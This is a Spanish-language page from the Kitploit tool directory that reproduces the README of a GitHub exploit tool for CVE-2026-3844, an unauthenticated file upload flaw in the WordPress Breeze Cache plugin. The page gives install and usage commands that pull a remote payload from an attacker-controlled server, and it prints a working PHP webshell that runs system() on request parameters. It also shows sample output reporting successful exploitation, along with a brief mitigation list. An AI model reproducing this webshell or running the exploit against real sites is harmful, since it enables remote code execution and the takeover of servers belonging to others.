Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-3844 — WordPress - Breeze Cache <= 2.4.4 - Carga Arbitraria de Archivos sin Autenticación | Kitploit
Herramientas/GitHubGitHub/0xgh057r3c0n/cve-2026-3844
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHub0xgh057r3c0n/cve-2026-3844

CVE-2026-3844

WordPress - Breeze Cache <= 2.4.4 - Carga Arbitraria de Archivos sin Autenticación

Ver Repositorio
112hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
WordPress Logo

CVE-2026-3844

Breeze Cache ≤ 2.4.4 - Subida Arbitraria de Archivos sin Autenticación

MIT License Python 3.6+ WordPress


⚠️ Aviso Legal

root@kitploit:~
ESTA HERRAMIENTA SE PROPORCIONA SOLO CON FINES EDUCATIVOS Y DE INVESTIGACIÓN EN SEGURIDAD.
El acceso no autorizado a sistemas informáticos es ilegal. Utilice esta herramienta únicamente en
sistemas que le pertenezcan o para los que tenga permiso explícito de prueba. El autor no asume
ninguna responsabilidad por el mal uso o los daños causados por este software.

📋 Descripción

CVE-2026-3844 es una vulnerabilidad crítica de subida arbitraria de archivos sin autenticación en el plugin Breeze Cache para WordPress (versiones ≤ 2.4.4). El plugin no valida correctamente el parámetro srcset en los comentarios, lo que permite a atacantes remotos subir archivos maliciosos (incluyendo webshells) al servidor.

🔴 Severidad

  • Puntuación CVSS: 9.8 (Crítica)
  • Vector de Ataque: Red
  • Autenticación Requerida: No
  • Impacto: Ejecución Remota de Código (RCE)

🎯 Versiones Afectadas

  • Breeze Cache ≤ 2.4.4
  • WordPress todas las versiones (dependiente del plugin)

🔧 Detalles Técnicos

La vulnerabilidad explota la funcionalidad de caché de Gravatar en Breeze. Cuando se publica un comentario con un parámetro srcset especialmente manipulado que contiene una URL de archivo remoto, Breeze descarga y almacena el archivo localmente en:

root@kitploit:~
/wp-content/cache/breeze-extra/gravatars/[marcador_aleatorio][extensión_del_archivo]

Requisito previo: La opción "Host Files Locally - Gravatars" debe estar habilitada en la configuración de Breeze.

🚀 Instalación

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844

# Instalar dependencias
pip install pycurl termcolor

💻 Uso

Uso Básico

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com

Opciones Avanzadas

root@kitploit:~
# Comprobar si el objetivo es vulnerable sin explotarlo
python3 CVE-2026-3844.py -u http://target.com --check-only

# Usar una URL de payload personalizada
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php

# Guardar la salida en un archivo
python3 CVE-2026-3844.py -u http://target.com -o shells.txt

# Aumentar el tiempo de espera para objetivos lentos
python3 CVE-2026-3844.py -u http://target.com --timeout 30

Argumentos de Línea de Comandos

ArgumentoDescripción
-u, --urlURL del objetivo (obligatorio)
-p, --payloadURL del payload remoto
--timeoutTiempo de espera de la solicitud en segundos (por defecto: 15)
--check-onlySolo comprobar si el objetivo es vulnerable
-o, --outputGuardar la URL del shell en un archivo

📝 Ejemplo de Payload Personalizado

Cree su propio webshell (shell.php):

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])) {
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>

Alójelo en algún lugar accesible y luego use:

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php

🔍 Cadena de Verificación

El exploit comprueba automáticamente la cadena de verificación 4356452d323032362d33383434 (codificación hexadecimal de "CVE-2026-3844") en el archivo subido para confirmar la explotación exitosa.

🛡️ Mitigación

  1. Actualice Breeze Cache a la versión 2.4.5 o superior
  2. Desactive "Host Files Locally - Gravatars" si no es necesario
  3. Implemente reglas de Firewall de Aplicación Web (WAF)
  4. Audite regularmente la funcionalidad de comentarios

📸 Captura de Pantalla

root@kitploit:~
[*] FASE 1: EVALUACIÓN DE VULNERABILIDAD
[*] Comprobando la versión del plugin Breeze...
[+] Objetivo VULNERABLE (Breeze v2.4.4)

[*] FASE 2: EXPLOTACIÓN
[!] REQUISITO: 'Host Files Locally - Gravatars' DEBE ESTAR HABILITADO
[*] Paso 1: Enviando comentario malicioso...
[+] Comentario publicado correctamente
[*] Paso 2: Esperando a que Breeze almacene el archivo en caché...
[*] Paso 3: Comprobando el archivo subido...
[+] Archivo encontrado en: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] CADENA DE VERIFICACIÓN ENCONTRADA - EXPLOTACIÓN EXITOSA!

[✓] ESTADO: ÉXITO
[✓] URL DEL WEBSHELL: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php

📁 Estructura de Directorios

root@kitploit:~
CVE-2026-3844/
├── CVE-2026-3844.py    # Script principal de explotación
├── README.md            # Este archivo
└── LICENSE              # Licencia MIT

📄 Licencia

Este proyecto está licenciado bajo la Licencia MIT - consulte el archivo LICENSE para más detalles.

🙏 Créditos

  • Autor: 0xgh057r3c0n
  • Descubrimiento: Equipo de investigación en seguridad
  • ID CVE: CVE-2026-3844

📞 Contacto

  • GitHub: @0xgh057r3c0n
  • Reportar problemas: GitHub Issues

⭐ Soporte

Si encuentra útil esta herramienta, ¡por favor dele una estrella ⭐ en GitHub!


Construido con 🐍 Python | Solo con fines educativos
Descargar herramienta